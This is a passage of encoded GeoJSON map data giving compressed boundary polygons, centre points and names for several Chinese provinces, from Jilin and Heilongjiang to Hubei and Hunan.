Ël]xxÄ_fT¤Ď¤cPC¨¸TVjbgH²sdÎdHt`B²¬GJję¶[ÐhjeXdlwhðSČ¦ªVÊÏÆZÆŶ®²^ÎyÅÎcPqńĚDMħĜŁH­kçvV[ĳ¼WYÀäĦ`XlR`ôLUVfK¢{NZdĒªYĸÌÚJRr¸SA|ƴgŴĴÆbvªØX~źB|¦ÕE¤Ð`\\\\|KUnnI]¤ÀÂĊnŎR®Ő¿¶\\\\ÀøíDm¦ÎbŨabaĘ\\\\ľãÂ¸atÎSƐ´©v\\\\ÖÚÌǴ¤Â¨JKrZ_ZfjþhPkx`YRIjJcVf~sCN¤ EhæmsHy¨SðÑÌ\\\\\\\\ĐRZk°IS§fqŒßýáĞÙÉÖ[^¯ǤŲê´\\\\¦¬ĆPM¯£»uïpùzExanµyoluqe¦W^£ÊL}ñrkqWňûPUP¡ôJoo·U}£[·¨@XĸDXm­ÛÝºGUCÁª½{íĂ^cjk¶Ã[q¤LÉö³cux«zZf²BWÇ®Yß½ve±ÃCý£W{Ú^q^sÑ·¨ÍOt¹·C¥GDrí@wÕKţÃ«V·i}xËÍ÷i©ĝɝǡ]{c±OW³Ya±_ç©HĕoƫŇqr³Lys[ñ³¯OSďOMisZ±ÅFC¥Pq{Ã[Pg}\\\\¿ghćOk^ģÁFıĉĥM­oEqqZûěŉ³F¦oĵhÕP{¯~TÍlªNßYÐ{Ps{ÃVUeĎwk±ŉVÓ½ŽJãÇÇ»Jm°dhcÀffdF~ĀeĖd`sx² ®EżĀdQÂd^~ăÔH¦\\\\LKpĄVez¤NP ǹÓRÆąJSh­a[¦´ÂghwmBÐ¨źhI|VV|p] Â¼èNä¶ÜBÖ¼L`¼bØæKVpoúNZÞÒKxpw|ÊEMnzEQIZZNBčÚFÜçmĩWĪñtÞĵÇñZ«uD±|Əlĳ¥ãn·±PmÍada CLǑkùó¡³Ï«QaċÏOÃ¥ÕđQȥċƭy³ÃA\"]],\"encodeOffsets\":[[[123686,41445]],[[126019,40435]],[[124393,40128]],[[126117,39963]],[[125322,40140]],[[126686,40700]],[[126041,40374]],[[125584,40168]],[[125453,40165]],[[125362,40214]],[[125280,40291]],[[125774,39997]],[[125976,40496]],[[125822,39993]],[[125509,40217]],[[122731,40949]]]}},{\"type\":\"Feature\",\"id\":\"220000\",\"properties\":{\"id\":\"220000\",\"cp\":[125.3245,43.886841],\"name\":\"吉林\",\"childNum\":1},\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@pä³PClFbbÍzwBGĭZÅi»lY­ċ²SgkÇ£^Sqd¯R©é£¯S\\\\cZ¹iűƏCuƍÓXoR}M^o£R}oªU­FuuXHlEÅÏ©¤ÛmTþ¤D²ÄufàÀ­XXÈ±AeyYw¬dvõ´KÊ£\\\\rµÄlidā]|î©¾DÂVH¹Þ®ÜWnCķ W§@\\\\¸~¤Vp¸póIO¢VOŇürXql~òÉK]¤¥Xrfkvzpm¶bwyFoúvð¼¤ N°ąO¥«³[éǡű_°Õ\\\\ÚÊĝþâőàerR¨­JYlďQ[ ÏYëÐ§TGztnß¡gFkMāGÁ¤ia ÉÈ¹`\\\\xs¬dĆkNnuNUuP@vRY¾\\\\¢GªóĄ~RãÖÎĢùđŴÕhQxtcæëSɽŉíëǉ£ƍG£nj°KƘµDsØÑpyĆ¸®¿bXp]vbÍZuĂ{n^IüÀSÖ¦EvRÎûh@â[ƏÈô~FNr¯ôçR±­HÑlĢ^¤¢OðævxsŒ]ÞÁTĠs¶¿âÆGW¾ìA¦·TÑ¬è¥ÏÐJ¨¼ÒÖ¼ƦɄxÊ~StD@Ă¼Ŵ¡jlºWvÐzƦZÐ²CH AxiukdGgetqmcÛ£Ozy¥cE}|¾cZk¿uŐã[oxGikfeäT@SUwpiÚFM©£è^Ú`@v¶eňf heP¶täOlÃUgÞzŸU`l}ÔÆUvØ_Ō¬Öi^ĉi§²ÃB~¡ĈÚEgc|DC_Ȧm²rBx¼MÔ¦ŮdĨÃâYxƘDVÇĺĿg¿cwÅ\\\\¹¥Yĭl¤OvLjM_a W`zļMž·\\\\swqÝSAqŚĳ¯°kRē°wx^ĐkǂÒ\\\\]nrĂ}²ĊŲÒøãh·M{yMzysěnĒġV·°G³¼XÀ¤¹i´o¤ŃÈ`ÌǲÄUĞd\\\\iÖmÈBĤÜɲDEh LG¾ƀÄ¾{WaYÍÈĢĘÔRîĐj}ÇccjoUb½{h§Ǿ{KƖµÎ÷GĀÖŠåưÎs­lyiē«`å§H¥Ae^§GK}iã\\\\c]v©ģZmÃ|[M}ģTɟĵÂÂ`ÀçmFK¥ÚíÁbX³ÌQÒHof{]ept·GŋĜYünĎųVY^ydõkÅZW«WUa~U·SbwGçǑiW^qFuNĝ·EwUtW·Ýďæ©PuqEzwAVXRãQ`­©GMehccďÏd©ÑW_ÏYƅ»é\\\\ɹ~ǙG³mØ©BšuT§Ĥ½¢Ã_Ã½L¡ýqT^rme\\\\PpZZbyuybQefµ]UhĿDCmûvaÙNSkCwncćfv~YÇG\"],\"encodeOffsets\":[[130196,42528]]}},{\"type\":\"Feature\",\"id\":\"230000\",\"properties\":{\"id\":\"230000\",\"cp\":[128.642464,46.756967],\"name\":\"黑龙江\",\"childNum\":2},\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@UµNÿ¥īèçHÍøƕ¶Lǽ|g¨|a¾pVidd~ÈiíďÓQġėÇZÎXb½|ſÃH½KFgɱCģÛÇAnjÕc[VĝǱÃËÇ_ £ń³pj£º¿»WH´¯U¸đĢmtĜyzzNN|g¸÷äűÑ±ĉā~mq^[ǁÑďlw]¯xQĔ¯l°řĴrBÞTxr[tŽ¸ĻN_yX`biNKuP£kZĮ¦[ºxÆÀdhĹŀUÈƗCwáZħÄŭcÓ¥»NAw±qȥnD`{ChdÙFć}¢A±Äj¨]ĊÕjŋ«×`VuÓÅ~_kŷVÝyhVkÄãPsOµfgeŇµf@u_Ù ÙcªNªÙEojVxT@ãSefjlwH\\\\pŏäÀvlY½d{F~¦dyz¤PÜndsrhfHcvlwjF£G±DÏƥYyÏu¹XikĿ¦ÏqƗǀOŜ¨LI|FRĂn sª|C˜zxAè¥bfudTrFWÁ¹Am|ĔĕsķÆF´N}ćUÕ@Áĳſmuçuð^ÊýowFzØÎĕNőǏȎôªÌŒǄàĀÄ˄ĞŀƒʀĀƘŸˮȬƬĊ°Uzouxe]}AyÈW¯ÌmKQ]Īºif¸ÄX|sZt|½ÚUÎ lk^p{f¤lºlÆW A²PVÜPHÊâ]ÎĈÌÜk´\\\\@qàsĔÄQºpRij¼èi`¶bXrBgxfv»uUi^v~J¬mVp´£´VWrnP½ì¢BX¬hðX¹^TjVriªjtŊÄmtPGx¸bgRsT`ZozÆO]ÒFôÒOÆŊvÅpcGêsx´DR{AEOr°x|íb³Wm~DVjºéNNËÜ˛ɶ­GxŷCSt}]ûōSmtuÇÃĕNāg»íT«u}ç½BĵÞʣ¥ëÊ¡MÛ³ãȅ¡ƋaǩÈÉQG¢·lG|tvgrrf«ptęŘnÅĢrI²¯LiØsPf_vĠdxM prʹL¤¤eËÀđKïÙVY§]Ióáĥ]ķK¥j|pŇ\\\\kzţ¦šnņäÔVĂîĪ¬|vW®l¤èØrxm¶ă~lÄƯĄ̈́öȄEÔ¤ØQĄĄ»ƢjȦOǺ¨ìSŖÆƬyQv`cwZSÌ®ü±Ǆ]ŀç¬B¬©ńzƺŷɄeeOĨSfm ĊƀP̎ēz©ĊÄÕÊmgÇsJ¥ƔŊśæÎÑqv¿íUOµªÂnĦÁ_½ä@êí£P}Ġ[@gġ}gɊ×ûÏWXá¢užƻÌsNÍ½ƎÁ§čŐAēeL³àydl¦ĘVçŁpśǆĽĺſÊQíÜçÛġÔsĕ¬Ǹ¯YßċġHµ ¡eå`ļrĉŘóƢFìĎWøxÊkƈdƬv|I|·©NqńRŀ¤éeŊŀàŀU²ŕƀBQ£Ď}L¹Îk@©ĈuǰųǨÚ§ƈnTËÇéƟÊcfčŤ^XmHĊĕË«W·ċëx³ǔķÐċJāwİ_ĸȀ^ôWr­°oú¬ĦŨK~ȰCĐ´Ƕ£fNÎèâw¢XnŮeÂÆĶ¾¾xäLĴĘlļO¤ÒĨA¢Êɚ¨®ØCÔ ŬGƠƦYĜĘÜƬDJg_ͥœ@čŅĻA¶¯@wÎqC½Ĉ»NăëKďÍQÙƫ[«ÃígßÔÇOÝáWñuZ¯ĥŕā¡ÑķJu¤E å¯°WKÉ±_d_}}vyõu¬ï¹ÓU±½@gÏ¿rÃ½DgCdµ°MFYxw¿CG£Rƛ½Õ{]L§{qqą¿BÇƻğëܭǊË|c²}Fµ}ÙRsÓpg±QNqǫŋRwŕnéÑÉK«SeYRŋ@{¤SJ}D Ûǖ֍]gr¡µŷjqWÛham³~S«Þ]\"]],\"encodeOffsets\":[[[134456,44547]]]}},{\"type\":\"Feature\",\"id\":\"320000\",\"properties\":{\"id\":\"320000\",\"cp\":[119.767413,33.041544],\"name\":\"江苏\",\"childNum\":1},\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@cþÅPi`ZRu¥É\\\\]~°Y`µÓ^phÁbnÀşúòaĬºTÖŒbe¦¦{¸ZâćNp©Hr|^mjhSEb\\\\afv`sz^lkljÄtg¤D­¾X¿À|ĐiZȀåB·î}GL¢õcßjayBFµÏC^ĭcÙt¿sğH]j{s©HM¢QnDÀ©DaÜÞ·jgàiDbPufjDk`dPOîhw¡ĥ¥GP²ĐobºrYî¶aHŢ´ ]´rılw³r_{£DB_Ûdåuk|Ũ¯F Cºyr{XFye³Þċ¿ÂkĭB¿MvÛpm`rÚã@Ę¹hågËÖƿxnlč¶Åì½Ot¾dJlVJĂǀŞqvnO^JZż·Q}êÍÅmµÒ]ƍ¦Dq}¬R^èĂ´ŀĻĊIÔtĲyQŐĠMNtR®òLhĚs©»}OÓGZz¶A\\\\jĨFäOĤHYJvÞHNiÜaĎÉnFQlNM¤B´ĄNöɂtpŬdfåqm¿QûùŞÚb¤uŃJŴu»¹ĄlȖħŴw̌ŵ²ǹǠ͛hĭłƕrçü±Yxcitğ®jű¢KOķCoy`å®VTa­_Ā]ŐÝɞï²ʯÊ^]afYǸÃĆēĪȣJđ͍ôƋÄÄÍīçÛɈǥ£­ÛmY`ó£Z«§°Ó³QafusNıǅ_k}¢m[ÝóDµ¡RLčiXyÅNïă¡¸iĔÏNÌŕoēdōîåŤûHcs}~Ûwbù¹£¦ÓCtOPrE^ÒogĉIµÛÅʹK¤½phMü`oæŀ\"],\"encodeOffsets\":[[121740,32276]]}},{\"type\":\"Feature\",\"id\":\"330000\",\"properties\":{\"id\":\"330000\",\"cp\":[120.153576,29.287459],\"name\":\"浙江\",\"childNum\":45},\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@E^dQ]K\"],[\"@@jX^j\"],[\"@@sfbU\"],[\"@@qP\\\\xz[ck\"],[\"@@R¢FX}°[s_\"],[\"@@Cb\\\\}\"],[\"@@e|v\\\\la{u\"],[\"@@v~u}\"],[\"@@QxÂF¯}\"],[\"@@¹nvÞs¯o\"],[\"@@rSkUEj\"],[\"@@bi­ZP\"],[\"@@p[}INf\"],[\"@@À¿\"],[\"@@¹dnb\"],[\"@@rSBnR\"],[\"@@g~h}\"],[\"@@FlEk\"],[\"@@OdPc\"],[\"@@v[u\\\\\"],[\"@@FjâL~wyoo~sµL\\\\\"],[\"@@¬e¹aN\"],[\"@@\\\\nÔ¡q]L³ë\\\\ÿ®QÖ\"],[\"@@ÊA­©[¬\"],[\"@@Kxv­\"],[\"@@@hlIk]\"],[\"@@pW{o||j\"],[\"@@Md|_mC\"],[\"@@¢X£ÏylD¼XtH\"],[\"@@hlÜ[LykAvyfw^E¤\"],[\"@@fp¤MusR\"],[\"@@®_ma~LÁ¬Z\"],[\"@@iMxZ\"],[\"@@ZcYd\"],[\"@@Z~dOSo|A¿qZv\"],[\"@@@`EN¡v\"],[\"@@|TY{\"],[\"@@@n@m\"],[\"@@XWkCT\\\\\"],[\"@@ºwZRkĕWO¢\"],[\"@@X®±GrÆª\\\\ÔáXq{\"],[\"@@ůTG°ĄLHm°UC\"],[\"@@¤aÜx~}dtüGæţŎíĔcŖpMËÐjē¢·ðĄÆMzjWKĎ¢Q¶À_ê_Bıi«pZgf¤Nrq]§ĂN®«H±yƳí¾×ŸīàLłčŴǝĂíÀBŖÕªÁŖHŗŉåqûõi¨hÜ·ñt»¹ýv_[«¸mYL¯QªmĉÅdMgÇjcº«ę¬­K­´B«Âącoċ\\\\xKd¡gěŧ«®á[~ıxu·ÅKsËÉc¢Ù\\\\ĭƛëbf¹­ģSĜkáƉÔ­ĈZB{aMµfzŉfåÂŧįƋǝÊĕġć£g³ne­ą»@­¦S®\\\\ßðChiqªĭiAuA­µ_W¥ƣO\\\\lċĢttC¨£t`PZäuXßBsĻyekOđġĵHuXBµ]×­­\\\\°®¬F¢¾pµ¼kŘó¬Wät¸|@L¨¸µrºù³Ù~§WIZW®±Ð¨ÒÉx`²pĜrOògtÁZ}þÙ]¡FKwsPlU[}¦Rvn`hq¬\\\\nQ´ĘRWb_ rtČFIÖkĦPJ¶ÖÀÖJĈĄTĚòC ²@PúØz©Pî¢£CÈÚĒ±hŖl¬â~nm¨f©iļ«mntuÖZÜÄjL®EÌFª²iÊxØ¨IÈhhst\"],[\"@@o\\\\VzRZ}y\"],[\"@@@°¡mÛGĕ¨§Ianá[ýƤjfæØLäGr\"]],\"encodeOffsets\":[[[125592,31553]],[[125785,31436]],[[125729,31431]],[[125513,31380]],[[125223,30438]],[[125115,30114]],[[124815,29155]],[[124419,28746]],[[124095,28635]],[[124005,28609]],[[125000,30713]],[[125111,30698]],[[125078,30682]],[[125150,30684]],[[124014,28103]],[[125008,31331]],[[125411,31468]],[[125329,31479]],[[125626,30916]],[[125417,30956]],[[125254,30976]],[[125199,30997]],[[125095,31058]],[[125083,30915]],[[124885,31015]],[[125218,30798]],[[124867,30838]],[[124755,30788]],[[124802,30809]],[[125267,30657]],[[125218,30578]],[[125200,30562]],[[124968,30474]],[[125167,30396]],[[124955,29879]],[[124714,29781]],[[124762,29462]],[[124325,28754]],[[123990,28459]],[[125366,31477]],[[125115,30363]],[[125369,31139]],[[122495,31878]],[[125329,30690]],[[125192,30787]]]}},{\"type\":\"Feature\",\"id\":\"340000\",\"properties\":{\"id\":\"340000\",\"cp\":[117.283042,31.26119],\"name\":\"安徽\",\"childNum\":3},\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@^iuLX^\"],[\"@@e©Ehl\"],[\"@@°ZÆëĎµmkǀwÌÕæhºgBĝâqÙĊzÖgņtÀÁĂÆáhEz|WzqD¹°Eŧl{ævÜcA`¤C`|´qxĲkq^³³GšµbíZ¹qpa±ď OH¦Ħx¢gPícOl_iCveaOjChß¸iÝbÛªCC¿mRV§¢A|t^iĠGÀtÚsd]ĮÐDE¶zAb àiödK¡~H¸íæAǿYj{ď¿À½W®£ChÃsikkly]_teu[bFaTign{]GqªoĈMYá|·¥f¥őaSÕėNµñĞ«Im_m¿Âa]uĜp Z_§{Cäg¤°r[_YjÆOdý[I[á·¥Q_nùgL¾mvˊBÜÆ¶ĊJhpc¹O]iŠ]¥ jtsggJÇ§w×jÉ©±EFË­KiÛÃÕYvsm¬njĻª§emná}k«ŕgđ²ÙDÇ¤í¡ªOy×Où±@DñSęćăÕIÕ¿IµĥOjNÕËT¡¿tNæŇàåyķrĕq§ÄĩsWÆßF¶X®¿mwRIÞfßoG³¾©uyHį{Ɓħ¯AFnuPÍÔzVdàôº^Ðæd´oG¤{S¬ćxã}ŧ×Kǥĩ«ÕOEÐ·ÖdÖsƘÑ¨[Û^Xr¢¼§xvÄÆµ`K§ tÒ´Cvlo¸fzŨð¾NY´ı~ÉĔēßúLÃÃ_ÈÏ|]ÂÏFlg`ben¾¢pUh~ƴĖ¶_r sĄ~cƈ]|r c~`¼{À{ȒiJjz`îÀT¥Û³]u}fïQl{skloNdjäËzDvčoQďHI¦rbtHĔ~BmlRV_ħTLnñH±DL¼Lªl§Ťa¸ĚlK²\\\\RòvDcÎJbt[¤D@®hh~kt°ǾzÖ@¾ªdbYhüóZ ň¶vHrľ\\\\ÊJuxAT|dmÀO[ÃÔG·ĚąĐlŪÚpSJ¨ĸLvÞcPæķŨ®mÐálwKhïgA¢ųÆ©Þ¤OÈm°K´\"]],\"encodeOffsets\":[[[121722,32278]],[[119475,30423]],[[119168,35472]]]}},{\"type\":\"Feature\",\"id\":\"350000\",\"properties\":{\"id\":\"350000\",\"cp\":[118.306239,26.075302],\"name\":\"福建\",\"childNum\":18},\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@zht´]\"],[\"@@aj^~ĆG©O\"],[\"@@ed¨C}}i\"],[\"@@@vPGsQ\"],[\"@@sBzddW]Q\"],[\"@@S¨Q{\"],[\"@@NVucW\"],[\"@@qptBAq\"],[\"@@¸[mu\"],[\"@@Q\\\\pD]_\"],[\"@@jSwUadpF\"],[\"@@eXª~\"],[\"@@AjvFso\"],[\"@@fT_Çí\\\\v|ba¦jZÆy°\"],[\"@@IjJi\"],[\"@@wJIx«¼AoNe{M­\"],[\"@@K±¡ÓČäeZ\"],[\"@@k¡¹Eh~c®wBkUplÀ¡I~Māe£bN¨gZý¡a±Öcp©PhI¢QqÇGj|¥U g[Ky¬ŏv@OptÉEF\\\\@ åA¬V{XģĐBycpě¼³Ăp·¤¥ohqqÚ¡ŅLs^Ã¡§qlÀhH¨MCe»åÇGD¥zPO£čÙkJA¼ßėuĕeûÒiÁŧSW¥Qûŗ½ùěcÝ§SùĩąSWó«íęACµeRåǃRCÒÇZÍ¢ź±^dlstjD¸ZpuÔâÃH¾oLUêÃÔjjēò´ĄWƛ^Ñ¥Ħ@ÇòmOw¡õyJyD}¢ďÑÈġfZda©º²z£NjD°Ötj¶¬ZSÎ~¾c°¶ÐmxO¸¢Pl´SL|¥AȪĖMņĲg®áIJČĒü` QF¬h|ĂJ@zµ |ê³È ¸UÖŬŬÀEttĸr]ðM¤ĶĲHtÏ AĬkvsq^aÎbvdfÊòSD´Z^xPsĂrvƞŀjJd×ŘÉ ®AÎ¦ĤdxĆqAZRÀMźnĊ»İÐZ YXæJyĊ²·¶q§·K@·{sXãô«lŗ¶»o½E¡­«¢±¨Y®Ø¶^AvWĶGĒĢPlzfļtàAvWYãO_¤sD§ssČġ[kƤPX¦`¶®BBvĪjv©jx[L¥àï[F¼ÍË»ğV`«Ip}ccÅĥZEãoP´B@D¸m±z«Ƴ¿å³BRØ¶Wlâþäą`]Z£Tc ĹGµ¶Hm@_©k¾xĨôȉðX«½đCIbćqK³ÁÄš¬OAwã»aLŉËĥW[ÂGIÂNxĳ¤D¢îĎÎB§°_JGs¥E@¤ućPåcuMuw¢BI¿]zG¹guĮck\\\\_\"]],\"encodeOffsets\":[[[123250,27563]],[[122541,27268]],[[123020,27189]],[[122916,27125]],[[122887,26845]],[[122808,26762]],[[122568,25912]],[[122778,26197]],[[122515,26757]],[[122816,26587]],[[123388,27005]],[[122450,26243]],[[122578,25962]],[[121255,25103]],[[120987,24903]],[[122339,25802]],[[121042,25093]],[[122439,26024]]]}},{\"type\":\"Feature\",\"id\":\"360000\",\"properties\":{\"id\":\"360000\",\"cp\":[115.592151,27.676493],\"name\":\"江西\",\"childNum\":1},\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ĢĨƐgļ¼ÂMD~ņªe^\\\\^§ý©j×cZØ¨zdÒa¶lÒJìõ`oz÷@¤uŞ¸´ôęöY¼HČƶajlÞƩ¥éZ[|h}^U  ¥pĄžƦO lt¸Æ Q\\\\aÆ|CnÂOjt­ĚĤdÈF`¶@Ðë ¦ōÒ¨SêvHĢûXD®QgÄWiØPÞìºr¤ǆNĠ¢lĄtZoCƞÔºCxrpĠV®Ê{f_Y`_eq®Aot`@oDXfkp¨|s¬\\\\DÄSfè©Hn¬^DhÆyøJhØxĢĀLÊƠPżċĄwȠĚ¦G®ǒĤäTŠÆ~Ħw«|TF¡nc³Ïå¹]ĉđxe{ÎÓvOEm°BƂĨİ|Gvz½ª´HàpeJÝQxnÀW­EµàXÅĪt¨ÃĖrÄwÀFÎ|ňÓMå¼ibµ¯»åDT±m[r«_gmQu~¥V\\\\OkxtL E¢Ú^~ýêPóqoě±_Êw§ÑªåƗā¼mĉŹ¿NQYBąrwģcÍ¥B­ŗÊcØiIƝĿuqtāwO]³YCñTeÉcaubÍ]trluīBÐGsĵıN£ï^ķqss¿FūūVÕ·´Ç{éĈýÿOER_đûIċâJh­ŅıNȩĕB¦K{Tk³¡OP·wnµÏd¯}½TÍ«YiµÕsC¯iM¤­¦¯P|ÿUHvhe¥oFTuõ\\\\OSsMòđƇiaºćXĊĵà·çhƃ÷Ç{ígu^đgm[×zkKN¶Õ»lčÓ{XSÆv©_ÈëJbVkĔVÀ¤P¾ºÈMÖxlò~ªÚàGĂ¢B±ÌKyáV¼Ã~­`gsÙfIƋlę¹e|~udjuTlXµf`¿Jd[\\\\L²\"],\"encodeOffsets\":[[116689,26234]]}},{\"type\":\"Feature\",\"id\":\"370000\",\"properties\":{\"id\":\"370000\",\"cp\":[118.000923,36.275807],\"name\":\"山东\",\"childNum\":13},\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@Xjd]{K\"],[\"@@itbFHy\"],[\"@@HlGk\"],[\"@@TGy\"],[\"@@K¬U\"],[\"@@WdXc\"],[\"@@PtOs\"],[\"@@LnXhc\"],[\"@@ppVu]Or\"],[\"@@cdzAUa\"],[\"@@udRhnCI\"],[\"@@oIpR\"],[\"@@Ľč{fzƤîKÎMĮ]ZF½Y]â£ph¶¨râøÀÎǨ¤^ºÄGz~grĚĜlĞÆLĆǆ¢Îo¦cvKbgr°WhmZp L]LºcUÆ­nżĤÌĒbAnrOA´ȊcÀbƦUØrĆUÜøĬƞEzVL®öØBkŖÝĐĖ¹ŧ̄±ÀbÎÉnb²ĦhņBĖįĦåXćì@L¯´ywƕCéÃµė ƿ¸lµ¾Z|ZWyFY¨Mf~C¿`à_RÇzwƌfQnny´INoƬèôº|sTJULîVjǎ¾ĒØDz²XPn±ŴPè¸ŔLƔÜƺ_TüÃĤBBċÈöA´faM¨{«M`¶d¡ôÖ°mȰBÔjj´PM|c^d¤u¤Û´ä«ƢfPk¶Môl]Lb}su^ke{lCMrDÇ­]NÑFsmoõľHyGă{{çrnÓEƕZGª¹Fj¢ïWuøCǷë¡ąuhÛ¡^KxC`C\\\\bÅxì²ĝÝ¿_NīCȽĿåB¥¢·IŖÕy\\\\¹kxÃ£Č×GDyÃ¤ÁçFQ¡KtŵƋ]CgÏAùSedcÚźuYfyMmhUWpSyGwMPqŀÁ¼zK¶G­Y§Ë@´śÇµƕBm@IogZ¯uTMx}CVKï{éƵP_K«pÛÙqċtkkù]gTğwoɁsMõ³ăAN£MRkmEÊčÛbMjÝGuIZGPģãħE[iµBEuDPÔ~ª¼ęt]ûG§¡QMsğNPŏįzs£Ug{đJĿļā³]ç«Qr~¥CƎÑ^n¶ÆéÎR~Ż¸YI] PumŝrƿIā[xeÇ³L¯v¯s¬ÁY~}ťuŁgƋpÝĄ_ņī¶ÏSR´ÁP~¿Cyċßdwk´SsX|t`Ä ÈðAªìÎT°¦Dda^lĎDĶÚY°`ĪŴǒàŠv\\\\ebZHŖR¬ŢƱùęOÑM­³FÛWp[\"]],\"encodeOffsets\":[[[123806,39303]],[[123821,39266]],[[123742,39256]],[[123702,39203]],[[123649,39066]],[[123847,38933]],[[123580,38839]],[[123894,37288]],[[123043,36624]],[[123344,38676]],[[123522,38857]],[[123628,38858]],[[118260,36742]]]}},{\"type\":\"Feature\",\"id\":\"410000\",\"properties\":{\"id\":\"410000\",\"cp\":[113.665412,33.757975],\"name\":\"河南\",\"childNum\":1},\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ýLùµP³swIÓxcŢĞð´E®ÚPtĴXØxÂ¶@«ŕŕQGYfa[şußǩđš_X³ĳÕčC]kbc¥CS¯ëÍB©÷³­Si_}mYTt³xlàcČzÀD}ÂOQ³ÐTĨ¯ƗòËŖ[hłŦv~}ÂZ«¤lPÇ£ªÝŴÅR§ØnhctâknÏ­ľŹUÓÝdKuķI§oTũÙďkęĆH¸Ó\\\\Ä¿PcnS{wBIvÉĽ[GqµuŇôYgûZca©@½Õǽys¯}lgg@­C\\\\£asIdÍuCQñ[L±ęk·ţb¨©kK»KC²òGKmĨS`UQnk}AGēsqaJ¥ĐGRĎpCuÌy ã iMcplk|tRkðev~^´¦ÜSí¿_iyjI|ȑ|¿_»d}q^{Ƈdă}tqµ`Ƴĕg}V¡om½faÇo³TTj¥tĠRyK{ùÓjuµ{t}uËRivGçJFjµÍyqÎàQÂFewixGw½Yŷpµú³XU½ġyłåkÚwZX·l¢Á¢KzOÎÎjc¼htoDHr|­J½}JZ_¯iPq{tę½ĕ¦Zpĵø«kQĹ¤]MÛfaQpě±ǽ¾]u­Fu÷nčÄ¯ADp}AjmcEÇaª³o³ÆÍSƇĈÙDIzËčľ^KLiÞñ[aA²zzÌ÷D|[íÄ³gfÕÞd®|`Ć~oĠƑô³ŊD×°¯CsøÀ«ìUMhTº¨¸ǡîSÔDruÂÇZÖEvPZW~ØÐtĄE¢¦Ðy¸bô´oŬ¬²Ês~]®tªapŎJ¨Öº_Ŕ`Ŗ^Đ\\\\Ĝu~m²Ƹ¸fWĦrƔ}Î^gjdfÔ¡J}\\\\n C¦þWxªJRÔŠu¬ĨĨmFdM{\\\\d\\\\YÊ¢ú@@¦ª²SÜsC}fNècbpRmlØ^gd¢aÒ¢CZZxvÆ¶N¿¢T@uC¬^ĊðÄn|lGlRjsp¢ED}Fio~ÔN~zkĘHVsǲßjŬŢ`Pûàl¢\\\\ÀEhİgÞē X¼Pk|m\"],\"encodeOffsets\":[[118256,37017]]}},{\"type\":\"Feature\",\"id\":\"420000\",\"properties\":{\"id\":\"420000\",\"cp\":[113.298572,30.684355],\"name\":\"湖北\",\"childNum\":3},\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@AB\"],[\"@@lskt\"],[\"@@¾«}{ra®pîÃ\\\\{øCËyyB±b\\\\òÝjKL ]ĎĽÌJyÚCƈćÎT´Å´pb©ÈdFin~BCo°BĎÃømv®E^vǾ½Ĝ²RobÜeN^ĺ£R¬lĶ÷YoĖ¥Ě¾|sOr°jY`~I¾®I{GqpCgyl{£ÍÍyPLÂ¡¡¸kWxYlÙæŁĢz¾V´W¶ùŸo¾ZHxjwfxGNÁ³Xéæl¶EièIH ujÌQ~v|sv¶Ôi|ú¢FhQsğ¦SiŠBgÐE^ÁÐ{čnOÂÈUÎóĔÊēĲ}Z³½Mŧïeyp·uk³DsÑ¨L¶_ÅuÃ¨w»¡WqÜ]\\\\Ò§tƗcÕ¸ÕFÏǝĉăxŻČƟOKÉġÿ×wg÷IÅzCg]m«ªGeçÃTC«[t§{loWeC@ps_Bp­rf_``Z|ei¡oċMqow¹DƝÓDYpûsYkıǃ}s¥ç³[§cY§HK«Qy]¢wwö¸ïx¼ņ¾Xv®ÇÀµRĠÐHM±cÏdƒǍũȅȷ±DSyúĝ£ŤĀàtÖÿï[îb\\\\}pĭÉI±Ñy¿³x¯No|¹HÏÛmjúË~TuęjCöAwě¬Rđl¯ Ñb­ŇTĿ_[IčĄʿnM¦ğ\\\\É[T·k¹©oĕ@A¾wya¥Y\\\\¥Âaz¯ãÁ¡k¥ne£ÛwE©Êō¶˓uoj_U¡cF¹­[WvP©whuÕyBF`RqJUw\\\\i¡{jEPïÿ½fćQÑÀQ{°fLÔ~wXgītêÝ¾ĺHd³fJd]HJ²EoU¥HhwQsƐ»Xmg±çve]DmÍPoCc¾_hhøYrŊU¶eD°Č_N~øĹĚ·`z]Äþp¼äÌQv\\\\rCé¾TnkžŐÚÜa¼ÝƆĢ¶ÛodĔňÐ¢JqPb ¾|J¾fXƐîĨ_Z¯À}úƲN_ĒÄ^ĈaŐyp»CÇÄKñL³ġM²wrIÒŭxjb[n«øæà ^²­h¯ÚŐªÞ¸Y²ĒVø}Ā^İ´LÚm¥ÀJÞ{JVųÞŃx×sxxƈē ģMřÚðòIfĊŒ\\\\Ʈ±ŒdÊ§ĘDvČ_Àæ~Dċ´A®µ¨ØLV¦êHÒ¤\"]],\"encodeOffsets\":[[[113712,34000]],[[115612,30507]],[[113649,34054]]]}},{\"type\":\"Feature\",\"id\":\"430000\",\"properties\":{\"id\":\"430000\",\"cp\":[111.782279,28.09409],\"name\":\"湖南\",\"childNum\":3},\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@nFTs\"],[\"@@ßÅÆá½ÔXrCOËRïÿĩ­TooQyÓ[ŅBE¬ÎÓXaį§Ã¸G °ITxpúxÚĳ¥ÏĢ¾edÄ©ĸGàGhM¤Â_U}Ċ}¢pczfþg¤ÇòAVM\"],[\"@@©KA·³CQ±Á«³BUƑ¹AtćOwD]JiØSm¯b£ylXHËÑ±H«C^õľAÅ§¤É¥ïyuǙuA¢^{ÌC´­¦ŷJ£^[ª¿ĕ~ƇN skóā¹¿ï]ă~÷O§­@Vm¡Qđ¦¢Ĥ{ºjÔª¥nf´~Õo×ÛąMąıuZmZcÒ ĲĪ²SÊǄŶ¨ƚCÖŎªQØ¼rŭ­«}NÏürÊ¬mjr@ĘrTW ­SsdHzƓ^ÇÂyUi¯DÅYlŹu{hT}mĉ¹¥ěDÿë©ıÓ[Oº£¥ótł¹MÕƪ`PDiÛU¾ÅâìUñBÈ£ýhedy¡oċ`pfmjP~kZa